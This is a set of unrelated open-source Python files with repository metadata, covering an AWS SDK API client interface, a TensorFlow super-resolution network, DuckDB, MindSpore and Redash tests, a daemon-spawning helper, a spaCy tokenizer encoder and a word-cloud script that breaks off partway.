# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
#
import typing
from abc import ABCMeta, abstractmethod
if typing.TYPE_CHECKING:
from .api_client_request import ApiClientRequest
from .api_client_response import ApiClientResponse
class ApiClient(object):
"""Represents a basic contract for API request invocation."""
__metaclass__ = ABCMeta
@abstractmethod
def invoke(self, request):
# type: (ApiClientRequest) -> ApiClientResponse
"""Dispatches a request to an API endpoint described in the request.
        The ApiClient is expected to resolve (rather than raise) when an API
        returns a non-200 HTTP status code; the responsibility of translating
        a particular response code into an error lies with the caller.
:param request: Request to dispatch to the ApiClient
:type request: ApiClientRequest
:return: Response from the client call
:rtype: ApiClientResponse
"""
pass
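# --- Editor's hedged sketch (not part of the SDK): a concrete ApiClient ---
# Attribute names on ApiClientRequest/ApiClientResponse (method, url,
# headers, body, status_code) are assumptions inferred from the sibling
# modules imported above; verify against the SDK before relying on this.
#
# import requests
#
# class RequestsApiClient(ApiClient):
#     def invoke(self, request):
#         raw = requests.request(
#             method=request.method, url=request.url,
#             headers=dict(request.headers or []), data=request.body)
#         # Resolve on non-200 codes too, per the contract documented above.
#         return ApiClientResponse(headers=list(raw.headers.items()),
#                                  status_code=raw.status_code, body=raw.text)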
|
d58fefeb1eb72821a10ab74108358e7b119890ea
|
f1067387acc6e436fe356e5d387cc806dfa20e41
|
/net.py
|
b687d505b2e076f68c3f831a8bc6db0e0a500d06
|
[
"MIT"
] |
permissive
|
nilboy/pixel-recursive-super-resolution
|
e9dcd636307ee62d53188973fa9d8e76c26e0e24
|
925d04afb44c035c10f604a7eca02e8f3bc5eb96
|
refs/heads/master
| 2021-01-20T13:23:35.222047
| 2017-07-02T12:18:03
| 2017-07-02T12:18:03
| 82,688,011
| 457
| 168
|
MIT
| 2019-05-07T14:28:16
| 2017-02-21T14:18:31
|
Python
|
UTF-8
|
Python
| false
| false
| 3,420
|
py
|
net.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import numpy as np
from ops import *
class Net(object):
def __init__(self, hr_images, lr_images, scope):
"""
        Args (pixel values in [0, 255]):
hr_images: [batch_size, hr_height, hr_width, in_channels] float32
lr_images: [batch_size, lr_height, lr_width, in_channels] float32
"""
with tf.variable_scope(scope) as scope:
self.train = tf.placeholder(tf.bool)
self.construct_net(hr_images, lr_images)
def prior_network(self, hr_images):
"""
        Args (values in [-0.5, 0.5]):
hr_images: [batch_size, hr_height, hr_width, in_channels]
Returns:
prior_logits: [batch_size, hr_height, hr_width, 3*256]
"""
with tf.variable_scope('prior') as scope:
conv1 = conv2d(hr_images, 64, [7, 7], strides=[1, 1], mask_type='A', scope="conv1")
inputs = conv1
state = conv1
for i in range(20):
inputs, state = gated_conv2d(inputs, state, [5, 5], scope='gated' + str(i))
conv2 = conv2d(inputs, 1024, [1, 1], strides=[1, 1], mask_type='B', scope="conv2")
conv2 = tf.nn.relu(conv2)
prior_logits = conv2d(conv2, 3 * 256, [1, 1], strides=[1, 1], mask_type='B', scope="conv3")
prior_logits = tf.concat([prior_logits[:, :, :, 0::3], prior_logits[:, :, :, 1::3], prior_logits[:, :, :, 2::3]], 3)
return prior_logits
def conditioning_network(self, lr_images):
"""
        Args (values in [-0.5, 0.5]):
lr_images: [batch_size, lr_height, lr_width, in_channels]
Returns:
conditioning_logits: [batch_size, hr_height, hr_width, 3*256]
"""
res_num = 6
with tf.variable_scope('conditioning') as scope:
inputs = lr_images
inputs = conv2d(inputs, 32, [1, 1], strides=[1, 1], mask_type=None, scope="conv_init")
for i in range(2):
for j in range(res_num):
inputs = resnet_block(inputs, 32, [3, 3], strides=[1, 1], scope='res' + str(i) + str(j), train=self.train)
inputs = deconv2d(inputs, 32, [3, 3], strides=[2, 2], scope="deconv" + str(i))
inputs = tf.nn.relu(inputs)
for i in range(res_num):
inputs = resnet_block(inputs, 32, [3, 3], strides=[1, 1], scope='res3' + str(i), train=self.train)
conditioning_logits = conv2d(inputs, 3*256, [1, 1], strides=[1, 1], mask_type=None, scope="conv")
return conditioning_logits
def softmax_loss(self, logits, labels):
logits = tf.reshape(logits, [-1, 256])
labels = tf.cast(labels, tf.int32)
labels = tf.reshape(labels, [-1])
return tf.losses.sparse_softmax_cross_entropy(
labels, logits)
def construct_net(self, hr_images, lr_images):
"""
        Args: hr_images and lr_images carry pixel values in [0, 255].
"""
        # labels are the raw hr pixel values in [0, 255]
        labels = hr_images
        # normalize images to [-0.5, 0.5]
hr_images = hr_images / 255.0 - 0.5
lr_images = lr_images / 255.0 - 0.5
self.prior_logits = self.prior_network(hr_images)
self.conditioning_logits = self.conditioning_network(lr_images)
loss1 = self.softmax_loss(self.prior_logits + self.conditioning_logits, labels)
loss2 = self.softmax_loss(self.conditioning_logits, labels)
loss3 = self.softmax_loss(self.prior_logits, labels)
self.loss = loss1 + loss2
tf.summary.scalar('loss', self.loss)
tf.summary.scalar('loss_prior', loss3)
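# --- Editor's hedged usage sketch (not part of the repo) ---
# The conditioning network upsamples twice with stride-2 deconvolutions,
# so lr_images must be 4x smaller than hr_images (e.g. 8x8 -> 32x32).
# Shapes below are illustrative only:
#
# hr = tf.placeholder(tf.float32, [None, 32, 32, 3])
# lr = tf.placeholder(tf.float32, [None, 8, 8, 3])
# net = Net(hr, lr, scope='prsr')
# # net.loss sums the joint (prior + conditioning) loss and the
# # conditioning-only loss; the prior-only loss is logged separately.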
|
80ab3fdab83116fc35389c8f8c9672df599a5ed9
|
39bcafc5f6b1672f31f0f6ea9c8d6047ee432950
|
/tools/pythonpkg/tests/fast/arrow/test_arrow_fetch.py
|
093989f1e06d93814d967817cbe6a5ca4c2fd0af
|
[
"MIT"
] |
permissive
|
duckdb/duckdb
|
315270af6b198d26eb41a20fc7a0eda04aeef294
|
f89ccfe0ec01eb613af9c8ac7c264a5ef86d7c3a
|
refs/heads/main
| 2023-09-05T08:14:21.278345
| 2023-09-05T07:28:59
| 2023-09-05T07:28:59
| 138,754,790
| 8,964
| 986
|
MIT
| 2023-09-14T18:42:49
| 2018-06-26T15:04:45
|
C++
|
UTF-8
|
Python
| false
| false
| 3,036
|
py
|
test_arrow_fetch.py
|
import duckdb
import pytest
try:
import pyarrow as pa
can_run = True
except ImportError:
can_run = False
def check_equal(duckdb_conn):
true_result = duckdb_conn.execute("SELECT * from test").fetchall()
duck_tbl = duckdb_conn.table("test")
duck_from_arrow = duckdb_conn.from_arrow(duck_tbl.arrow())
duck_from_arrow.create("testarrow")
arrow_result = duckdb_conn.execute("SELECT * from testarrow").fetchall()
assert arrow_result == true_result
class TestArrowFetch(object):
def test_over_vector_size(self, duckdb_cursor):
if not can_run:
return
duckdb_conn = duckdb.connect()
duckdb_conn.execute("CREATE TABLE test (a INTEGER)")
for value in range(10000):
duckdb_conn.execute("INSERT INTO test VALUES (" + str(value) + ");")
duckdb_conn.execute("INSERT INTO test VALUES(NULL);")
check_equal(duckdb_conn)
def test_empty_table(self, duckdb_cursor):
if not can_run:
return
duckdb_conn = duckdb.connect()
duckdb_conn.execute("CREATE TABLE test (a INTEGER)")
check_equal(duckdb_conn)
def test_table_nulls(self, duckdb_cursor):
if not can_run:
return
duckdb_conn = duckdb.connect()
duckdb_conn.execute("CREATE TABLE test (a INTEGER)")
duckdb_conn.execute("INSERT INTO test VALUES(NULL);")
check_equal(duckdb_conn)
def test_table_without_nulls(self, duckdb_cursor):
if not can_run:
return
duckdb_conn = duckdb.connect()
duckdb_conn.execute("CREATE TABLE test (a INTEGER)")
duckdb_conn.execute("INSERT INTO test VALUES(1);")
check_equal(duckdb_conn)
def test_table_with_prepared_statements(self, duckdb_cursor):
if not can_run:
return
duckdb_conn = duckdb.connect()
duckdb_conn.execute("CREATE TABLE test (a INTEGER)")
duckdb_conn.execute("PREPARE s1 AS INSERT INTO test VALUES ($1), ($2 / 2)")
for value in range(10000):
duckdb_conn.execute("EXECUTE s1(" + str(value) + "," + str(value * 2) + ");")
check_equal(duckdb_conn)
def test_to_arrow_chunk_size(self, duckdb_cursor):
if not can_run:
return
duckdb_cursor = duckdb.connect()
duckdb_cursor.execute("CREATE table t as select range a from range(3000);")
relation = duckdb_cursor.table('t')
arrow_tbl = relation.arrow()
assert arrow_tbl['a'].num_chunks == 1
arrow_tbl = relation.arrow(2048)
assert arrow_tbl['a'].num_chunks == 2
|
5f70ea3c9deb7b801436279ec0a19529e36874e8
|
ffdc77394c5b5532b243cf3c33bd584cbdc65cb7
|
/tests/st/ops/gpu/test_ger_op.py
|
0669521c10f2aa11b36986c074416452ec4cfca8
|
[
"Apache-2.0",
"LicenseRef-scancode-proprietary-license",
"MPL-1.0",
"OpenSSL",
"LGPL-3.0-only",
"LicenseRef-scancode-warranty-disclaimer",
"BSD-3-Clause-Open-MPI",
"MIT",
"MPL-2.0-no-copyleft-exception",
"NTP",
"BSD-3-Clause",
"GPL-1.0-or-later",
"0BSD",
"MPL-2.0",
"LicenseRef-scancode-free-unknown",
"AGPL-3.0-only",
"Libpng",
"MPL-1.1",
"IJG",
"GPL-2.0-only",
"BSL-1.0",
"Zlib",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-python-cwi",
"BSD-2-Clause",
"LicenseRef-scancode-gary-s-brown",
"LGPL-2.1-only",
"LicenseRef-scancode-other-permissive",
"Python-2.0",
"LicenseRef-scancode-mit-nagy",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense"
] |
permissive
|
mindspore-ai/mindspore
|
ca7d5bb51a3451c2705ff2e583a740589d80393b
|
54acb15d435533c815ee1bd9f6dc0b56b4d4cf83
|
refs/heads/master
| 2023-07-29T09:17:11.051569
| 2023-07-17T13:14:15
| 2023-07-17T13:14:15
| 239,714,835
| 4,178
| 768
|
Apache-2.0
| 2023-07-26T22:31:11
| 2020-02-11T08:43:48
|
C++
|
UTF-8
|
Python
| false
| false
| 4,402
|
py
|
test_ger_op.py
|
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
import pytest
import mindspore
from mindspore import context
from mindspore import Tensor
from mindspore.ops import operations as P
from mindspore import nn
context.set_context(mode=context.GRAPH_MODE, device_target="GPU")
class GerNet(nn.Cell):
def __init__(self):
super(GerNet, self).__init__()
self.ger = P.Ger()
def construct(self, x1, x2):
return self.ger(x1, x2)
def ger_graph(x1, x2, ms_type, nptype):
context.set_context(mode=context.GRAPH_MODE, device_target='GPU')
ger_ = GerNet()
ms_x1 = Tensor(x1, ms_type)
ms_x2 = Tensor(x2, ms_type)
ger_output = ger_(ms_x1, ms_x2)
ger_expect = np.outer(x1, x2).astype(nptype)
assert (ger_output.asnumpy() == ger_expect).all()
def ger_pynative(x1, x2, ms_type, nptype):
context.set_context(mode=context.PYNATIVE_MODE, device_target='GPU')
ger_ = GerNet()
ms_x1 = Tensor(x1, ms_type)
ms_x2 = Tensor(x2, ms_type)
ger_output = ger_(ms_x1, ms_x2)
ger_expect = np.outer(x1, x2).astype(nptype)
assert (ger_output.asnumpy() == ger_expect).all()
@pytest.mark.level1
@pytest.mark.platform_x86_gpu_training
@pytest.mark.env_onecard
def test_ger_pynative_fp16():
"""
Feature: ALL To ALL
Description: test cases for Ger
    Expectation: the result matches numpy
"""
x1 = np.random.randint(-100, 100, size=10)
x2 = np.random.randint(-100, 100, size=10)
ger_pynative(x1, x2, mindspore.float16, np.float16)
@pytest.mark.level1
@pytest.mark.platform_x86_gpu_training
@pytest.mark.env_onecard
def test_ger_pynative_fp32():
"""
Feature: ALL To ALL
Description: test cases for Ger
    Expectation: the result matches numpy
"""
x1 = np.random.randint(-100, 100, size=10)
x2 = np.random.randint(-100, 100, size=10)
ger_pynative(x1, x2, mindspore.float32, np.float32)
@pytest.mark.level1
@pytest.mark.platform_x86_gpu_training
@pytest.mark.env_onecard
def test_ger_pynative_fp64():
"""
Feature: ALL To ALL
Description: test cases for Ger
    Expectation: the result matches numpy
"""
x1 = np.random.randint(-100, 100, size=10)
x2 = np.random.randint(-100, 100, size=10)
ger_pynative(x1, x2, mindspore.float64, np.float64)
@pytest.mark.level1
@pytest.mark.platform_x86_gpu_training
@pytest.mark.env_onecard
def test_ger_graph_fp16():
"""
Feature: ALL To ALL
Description: test cases for Ger
    Expectation: the result matches numpy
"""
x1 = np.random.randint(-100, 100, size=10)
x2 = np.random.randint(-100, 100, size=10)
ger_graph(x1, x2, mindspore.float16, np.float16)
@pytest.mark.level1
@pytest.mark.platform_x86_gpu_training
@pytest.mark.env_onecard
def test_ger_graph_fp32():
"""
Feature: ALL To ALL
Description: test cases for Ger
    Expectation: the result matches numpy
"""
x1 = np.random.randint(-100, 100, size=10)
x2 = np.random.randint(-100, 100, size=10)
ger_graph(x1, x2, mindspore.float32, np.float32)
@pytest.mark.level1
@pytest.mark.platform_x86_gpu_training
@pytest.mark.env_onecard
def test_ger_graph_fp64():
"""
Feature: ALL To ALL
Description: test cases for Ger
    Expectation: the result matches numpy
"""
x1 = np.random.randint(-100, 100, size=10)
x2 = np.random.randint(-100, 100, size=10)
ger_graph(x1, x2, mindspore.float64, np.float64)
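# --- Editor's note ---
# Ger computes the outer product of two 1-D tensors, matching np.outer:
# np.outer([1, 2], [3, 4]) -> [[3, 4], [6, 8]], i.e. out[i, j] = x1[i] * x2[j].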
|
9198bff131b44d60c8ba1bdf23e3e132215ef2f5
|
653b92ea0aeedd6a4f7517933ad1dba1dbaf4375
|
/pythonscripts/daemon.py
|
ac7526d09a45090f3e202e114380d37588a10e93
|
[] |
no_license
|
lahwaacz/Scripts
|
1231d0b8914834c75a5c3346faed85036223e64d
|
a964bdb8512b11f3a921b3bc680f557ef2ec83d9
|
refs/heads/master
| 2023-09-03T11:52:44.360320
| 2023-08-29T16:29:19
| 2023-08-29T16:29:19
| 41,174,443
| 201
| 65
| null | 2020-04-10T19:41:41
| 2015-08-21T19:44:44
|
Python
|
UTF-8
|
Python
| false
| false
| 1,797
|
py
|
daemon.py
|
#! /usr/bin/env python
import os
def spawnDaemon(*args, detach_fds=True):
"""Spawn a completely detached subprocess (i.e., a daemon).
    For example:
spawnDaemon("../bin/producenotify.py", "producenotify.py", "xx")
"""
if len(args) == 0:
raise ValueError("no arguments supplied")
# fork the first time (to make a non-session-leader child process)
try:
pid = os.fork()
except OSError as e:
raise RuntimeError("1st fork failed: %s [%d]" % (e.strerror, e.errno))
if pid != 0:
# parent (calling) process is all done
return
# detach from controlling terminal (to make child a session-leader)
os.setsid()
try:
pid = os.fork()
except OSError as e:
raise RuntimeError("2nd fork failed: %s [%d]" % (e.strerror, e.errno))
raise Exception("%s [%d]" % (e.strerror, e.errno))
if pid != 0:
# child process is all done
os._exit(0)
if detach_fds:
# grandchild process now non-session-leader, detached from parent
# grandchild process must now close all open files
try:
maxfd = os.sysconf("SC_OPEN_MAX")
except (AttributeError, ValueError):
maxfd = 1024
for fd in range(maxfd):
try:
os.close(fd)
except OSError: # ERROR, fd wasn't open to begin with (ignored)
pass
# redirect stdin, stdout and stderr to /dev/null
        os.open(os.devnull, os.O_RDWR)  # standard input (0)
os.dup2(0, 1)
os.dup2(0, 2)
# and finally let's execute the executable for the daemon!
try:
os.execvp(args[0], args)
except Exception as e:
# oops, we're cut off from the world, let's just give up
os._exit(255)
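# --- Editor's hedged usage sketch ---
# Launch a program fully detached from the calling process; "xclock" is a
# placeholder for any executable on PATH.
if __name__ == "__main__":
    spawnDaemon("xclock")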
|
88f83fbfaba918aefa136da6f8f61f076f24fe50
|
06d86ca0465405a7d1a64fc6dbf4980f76565e54
|
/torchnlp/encoders/text/spacy_encoder.py
|
4e2b2a6b3f3f7e10bd8af017dc911210137e4b35
|
[
"BSD-3-Clause"
] |
permissive
|
PetrochukM/PyTorch-NLP
|
22b7f2628d6545270bc36964ce4551609f84ca9f
|
53d7edcb8e0c099efce7c2ddf8cd7c44157fcac3
|
refs/heads/master
| 2023-08-05T20:15:06.954467
| 2023-07-04T21:11:26
| 2023-07-04T21:11:26
| 122,806,629
| 2,304
| 290
|
BSD-3-Clause
| 2022-07-16T23:44:23
| 2018-02-25T05:00:36
|
Python
|
UTF-8
|
Python
| false
| false
| 2,789
|
py
|
spacy_encoder.py
|
from functools import partial
from torchnlp.encoders.text.static_tokenizer_encoder import StaticTokenizerEncoder
def _tokenize(s, tokenizer):
return [w.text for w in tokenizer(s)]
class SpacyEncoder(StaticTokenizerEncoder):
""" Encodes the text using spaCy's tokenizer.
**Tokenizer Reference:**
https://spacy.io/api/tokenizer
Args:
**args: Arguments passed onto ``StaticTokenizerEncoder.__init__``.
language (string, optional): Language to use for parsing. Accepted values
are 'en', 'de', 'es', 'pt', 'fr', 'it', 'nl' and 'xx'.
For details see https://spacy.io/models/#available-models
**kwargs: Keyword arguments passed onto ``StaticTokenizerEncoder.__init__``.
Example:
>>> encoder = SpacyEncoder(["This ain't funny.", "Don't?"])
>>> encoder.encode("This ain't funny.")
tensor([5, 6, 7, 8, 9])
>>> encoder.vocab
['<pad>', '<unk>', '</s>', '<s>', '<copy>', 'This', 'ai', "n't", 'funny', '.', 'Do', '?']
>>> encoder.decode(encoder.encode("This ain't funny."))
"This ai n't funny ."
"""
def __init__(self, *args, **kwargs):
if 'tokenize' in kwargs:
raise TypeError('``SpacyEncoder`` does not take keyword argument ``tokenize``.')
try:
import spacy
except ImportError:
print("Please install spaCy: " "`pip install spacy`")
raise
# Use English as default when no language was specified
language = kwargs.get('language', 'en')
# All languages supported by spaCy can be found here:
# https://spacy.io/models/#available-models
supported_languages = ['en', 'de', 'es', 'pt', 'fr', 'it', 'nl', 'xx']
if language in supported_languages:
# Load the spaCy language model if it has been installed
try:
self.spacy = spacy.load(language, disable=['parser', 'tagger', 'ner'])
except OSError:
raise ValueError(("Language '{0}' not found. Install using "
"spaCy: `python -m spacy download {0}`").format(language))
else:
raise ValueError(
("No tokenizer available for language '%s'. " + "Currently supported are %s") %
(language, supported_languages))
super().__init__(*args, tokenize=partial(_tokenize, tokenizer=self.spacy), **kwargs)
def batch_encode(self, sequences):
# Batch tokenization is handled by ``self.spacy.pipe``
original = self.tokenize
self.tokenize = lambda sequence: [token.text for token in sequence]
return_ = super().batch_encode(self.spacy.pipe(sequences))
self.tokenize = original
return return_
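# --- Editor's hedged usage sketch (not part of the library) ---
# batch_encode routes tokenization through spaCy's pipe() for speed; the
# exact return shape (padding, lengths) is determined by the
# StaticTokenizerEncoder base class, so this is indicative only.
#
# encoder = SpacyEncoder(["This ain't funny.", "Don't?"])
# encoded = encoder.batch_encode(["This ain't funny.", "Don't?"])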
|
f0e8ddac79cb28c58255040d4ec340cbecad4e19
|
70d1905e59ef92a5a082dc43e8861d86e47079f6
|
/tests/handlers/test_permissions.py
|
2e831b7f833821364885fff4fdc637a8d2b81237
|
[
"BSD-2-Clause"
] |
permissive
|
getredash/redash
|
3c34d843a82e461be3a2efa416d66f7d4c248097
|
7b722a1067397a3ecb408b2c5df07d75250fb66a
|
refs/heads/master
| 2023-09-01T18:14:21.257904
| 2023-09-01T12:11:47
| 2023-09-01T12:11:47
| 13,926,404
| 23,871
| 4,772
|
BSD-2-Clause
| 2023-09-14T11:54:15
| 2013-10-28T13:19:39
|
Python
|
UTF-8
|
Python
| false
| false
| 7,522
|
py
|
test_permissions.py
|
from redash.models import AccessPermission
from redash.permissions import ACCESS_TYPE_MODIFY
from tests import BaseTestCase
class TestObjectPermissionsListGet(BaseTestCase):
def test_returns_empty_list_when_no_permissions(self):
query = self.factory.create_query()
user = self.factory.user
rv = self.make_request("get", "/api/queries/{}/acl".format(query.id), user=user)
self.assertEqual(rv.status_code, 200)
self.assertEqual({}, rv.json)
def test_returns_permissions(self):
query = self.factory.create_query()
user = self.factory.user
AccessPermission.grant(
obj=query,
access_type=ACCESS_TYPE_MODIFY,
grantor=self.factory.user,
grantee=self.factory.user,
)
rv = self.make_request("get", "/api/queries/{}/acl".format(query.id), user=user)
self.assertEqual(rv.status_code, 200)
self.assertIn("modify", rv.json)
self.assertEqual(user.id, rv.json["modify"][0]["id"])
def test_returns_404_for_outside_of_organization_users(self):
query = self.factory.create_query()
user = self.factory.create_user(org=self.factory.create_org())
rv = self.make_request("get", "/api/queries/{}/acl".format(query.id), user=user)
self.assertEqual(rv.status_code, 404)
class TestObjectPermissionsListPost(BaseTestCase):
def test_creates_permission_if_the_user_is_an_owner(self):
query = self.factory.create_query()
other_user = self.factory.create_user()
data = {"access_type": ACCESS_TYPE_MODIFY, "user_id": other_user.id}
rv = self.make_request("post", "/api/queries/{}/acl".format(query.id), user=query.user, data=data)
self.assertEqual(200, rv.status_code)
self.assertTrue(AccessPermission.exists(query, ACCESS_TYPE_MODIFY, other_user))
def test_returns_403_if_the_user_isnt_owner(self):
query = self.factory.create_query()
other_user = self.factory.create_user()
data = {"access_type": ACCESS_TYPE_MODIFY, "user_id": other_user.id}
rv = self.make_request("post", "/api/queries/{}/acl".format(query.id), user=other_user, data=data)
self.assertEqual(403, rv.status_code)
def test_returns_400_if_the_grantee_isnt_from_organization(self):
query = self.factory.create_query()
other_user = self.factory.create_user(org=self.factory.create_org())
data = {"access_type": ACCESS_TYPE_MODIFY, "user_id": other_user.id}
rv = self.make_request("post", "/api/queries/{}/acl".format(query.id), user=query.user, data=data)
self.assertEqual(400, rv.status_code)
def test_returns_404_if_the_user_from_different_org(self):
query = self.factory.create_query()
other_user = self.factory.create_user(org=self.factory.create_org())
data = {"access_type": ACCESS_TYPE_MODIFY, "user_id": other_user.id}
rv = self.make_request("post", "/api/queries/{}/acl".format(query.id), user=other_user, data=data)
self.assertEqual(404, rv.status_code)
def test_accepts_only_correct_access_types(self):
query = self.factory.create_query()
other_user = self.factory.create_user()
data = {"access_type": "random string", "user_id": other_user.id}
rv = self.make_request("post", "/api/queries/{}/acl".format(query.id), user=query.user, data=data)
self.assertEqual(400, rv.status_code)
class TestObjectPermissionsListDelete(BaseTestCase):
def test_removes_permission(self):
query = self.factory.create_query()
user = self.factory.user
other_user = self.factory.create_user()
data = {"access_type": ACCESS_TYPE_MODIFY, "user_id": other_user.id}
AccessPermission.grant(
obj=query,
access_type=ACCESS_TYPE_MODIFY,
grantor=self.factory.user,
grantee=other_user,
)
rv = self.make_request("delete", "/api/queries/{}/acl".format(query.id), user=user, data=data)
self.assertEqual(rv.status_code, 200)
self.assertFalse(AccessPermission.exists(query, ACCESS_TYPE_MODIFY, other_user))
def test_removes_permission_created_by_another_user(self):
query = self.factory.create_query()
other_user = self.factory.create_user()
data = {"access_type": ACCESS_TYPE_MODIFY, "user_id": other_user.id}
AccessPermission.grant(
obj=query,
access_type=ACCESS_TYPE_MODIFY,
grantor=self.factory.user,
grantee=other_user,
)
rv = self.make_request(
"delete",
"/api/queries/{}/acl".format(query.id),
user=self.factory.create_admin(),
data=data,
)
self.assertEqual(rv.status_code, 200)
self.assertFalse(AccessPermission.exists(query, ACCESS_TYPE_MODIFY, other_user))
def test_returns_404_for_outside_of_organization_users(self):
query = self.factory.create_query()
user = self.factory.create_user(org=self.factory.create_org())
data = {"access_type": ACCESS_TYPE_MODIFY, "user_id": user.id}
rv = self.make_request("delete", "/api/queries/{}/acl".format(query.id), user=user, data=data)
self.assertEqual(rv.status_code, 404)
def test_returns_403_for_non_owner(self):
query = self.factory.create_query()
user = self.factory.create_user()
data = {"access_type": ACCESS_TYPE_MODIFY, "user_id": user.id}
rv = self.make_request("delete", "/api/queries/{}/acl".format(query.id), user=user, data=data)
self.assertEqual(rv.status_code, 403)
def test_returns_200_even_if_there_is_no_permission(self):
query = self.factory.create_query()
user = self.factory.create_user()
data = {"access_type": ACCESS_TYPE_MODIFY, "user_id": user.id}
rv = self.make_request("delete", "/api/queries/{}/acl".format(query.id), user=query.user, data=data)
self.assertEqual(rv.status_code, 200)
class TestCheckPermissionsGet(BaseTestCase):
def test_returns_true_for_existing_permission(self):
query = self.factory.create_query()
other_user = self.factory.create_user()
AccessPermission.grant(
obj=query,
access_type=ACCESS_TYPE_MODIFY,
grantor=self.factory.user,
grantee=other_user,
)
rv = self.make_request(
"get",
"/api/queries/{}/acl/{}".format(query.id, ACCESS_TYPE_MODIFY),
user=other_user,
)
self.assertEqual(rv.status_code, 200)
self.assertEqual(True, rv.json["response"])
    def test_returns_false_for_nonexisting_permission(self):
query = self.factory.create_query()
other_user = self.factory.create_user()
rv = self.make_request(
"get",
"/api/queries/{}/acl/{}".format(query.id, ACCESS_TYPE_MODIFY),
user=other_user,
)
self.assertEqual(rv.status_code, 200)
self.assertEqual(False, rv.json["response"])
def test_returns_404_for_outside_of_org_users(self):
query = self.factory.create_query()
other_user = self.factory.create_user(org=self.factory.create_org())
rv = self.make_request(
"get",
"/api/queries/{}/acl/{}".format(query.id, ACCESS_TYPE_MODIFY),
user=other_user,
)
self.assertEqual(rv.status_code, 404)
|
6cf5a6caffd25301a8e5c37283a722ce50087fc1
|
fb3956e55a31e1c0bcef9827f1d6e80e751e827c
|
/heart_cloud_word.py
|
c49e75aacd8ca3e6f9c5fbd5933487079fface55
|
[] |
no_license
|
HeLiangHIT/coders_love
|
406073000b0c06b896769459f29a2dabc93906cf
|
aa927558b57fed3d48ed093094fe7636d6bdd9f1
|
refs/heads/master
| 2023-07-19T21:42:42.920961
| 2021-05-30T14:52:46
| 2021-05-30T14:52:46
| 134,127,148
| 121
| 37
| null | 2023-07-06T21:16:01
| 2018-05-20T06:56:35
|
Python
|
UTF-8
|
Python
| false
| false
| 4,668
|
py
|
heart_cloud_word.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2018-05-20 18:26:50
# @Author : He Liang (heianghit@foxmail.com)
# @Link : https://github.com/HeLiangHIT
# ref : https://github.com/amueller/word_cloud
# usage: python heart_cloud_word.py --help
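# e.g. (hypothetical invocation, assuming the bundled ./data files exist):
#   python heart_cloud_word.py -t ./data/love_letter.txt -m ./data/heart.jpg -o ./out/word_cloud.png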
import jieba
import numpy
import pandas
import matplotlib.pyplot as plt
from wordcloud import WordCloud
from imageio import imread  # scipy.misc.imread was removed in SciPy >= 1.2; imageio is the usual drop-in replacement
from PIL import Image, ImageDraw
from wordcloud import ImageColorGenerator
from clize import Parameter, run
# jieba.load_userdict("./data/userdict.txt")  # load a custom user dictionary
def cut_file_text(text_file):
    # Read the file content and segment it into words
with open(text_file, encoding='utf8') as f:
content = f.read()
    segs = jieba.cut(content)  # word segmentation
    return [seg for seg in segs if len(seg) > 1 and seg != '\r\n']  # drop punctuation, single characters and newlines
# Read the content (quick manual check)
# segment = cut_file_text("./data/love_letter.txt")
# print(segment)
def word_statistics(seg, stop_words="./data/stopwords.txt"):
    # 1. Remove unwanted words; keep the segments in a pandas DataFrame so the
    #    frequency statistics below are easy to compute
    words_df = pandas.DataFrame({'segment': seg})
    # words_df.head()  # inspect the first rows
    stopwords = pandas.read_csv(stop_words, index_col=False, quoting=3, sep="\t", names=['stopword'], encoding="utf8")
    words_df = words_df[~words_df.segment.isin(stopwords.stopword)]
    # 2. Word frequency statistics (dict-style Series.agg was removed in pandas 0.25+)
    words_stat = words_df.groupby('segment').size().reset_index(name='count')
    words_stat = words_stat.sort_values("count", ascending=False)
# words_stat.to_csv('result.txt',sep='\t', encoding='utf-8')
return words_stat
# word_stat = word_statistics(segment)
# print(word_stat.head(20000))
def _show_and_save_img(img, file_name = None):
if file_name is not None:
img.to_file(file_name)
plt.axis("off")
plt.imshow(img)
plt.show()
# ref: https://github.com/amueller/word_cloud
def gen_word_cloud_rectangle(words_stat, font_path="./demo.ttf", background_color="white"):
    # Use matplotlib and wordcloud to visualize the word-frequency statistics above
wordcloud = WordCloud(font_path=font_path, background_color=background_color)
word_frequence = {x[0]: x[1] for x in words_stat.head(20000).values}
    # show at most 20000 words
wordcloud = wordcloud.fit_words(word_frequence)
return wordcloud
# img = gen_word_cloud_rectangle(word_stat)
# _show_and_save_img(img)
def gen_word_cloud_picture(words_stat, font_path="./demo.ttf", mask_file="./data/heart.jpg",
word_color_img="./data/pink.jpg", background_color="white"):
    # Use a custom image mask and render the word cloud
mask_img = imread(mask_file)
wordcloud = WordCloud(background_color=background_color, mask=mask_img, font_path=font_path)
word_frequence = {x[0]: x[1] for x in words_stat.head(20000).values}
wordcloud = wordcloud.fit_words(word_frequence)
color_img = imread(word_color_img)
mask_color = ImageColorGenerator(color_img)
return wordcloud.recolor(color_func=mask_color)
# img = gen_word_cloud_picture(word_stat)
# _show_and_save_img(img, "./out/word_cloud.png")
def add_background(img, background="./data/background.jpg"):
    # Add a background image to the word cloud
new_img = img.to_image() # convert to Image
background = Image.open(background)
final_img = Image.blend(background, new_img, 1)
    # This blend simply overwrites; converting to numpy arrays first and compositing conditionally would work better
final_img.show()
final_img.save("./out/word_cloud.png")
# add_background(img)
# ref: http://clize.readthedocs.io/en/stable/basics.html#collecting-all-positional-arguments
def main(*par, text_file:'t'="./data/love_letter.txt", stop_file:'s'="./data/stopwords.txt", color_img:'c'="./data/pink.jpg",
mask_file:'m'="./data/heart.jpg", out_file:'o'="./out/word_cloud.png", font_path: 'p'='./demo.ttf',):
    '''Generate a word cloud
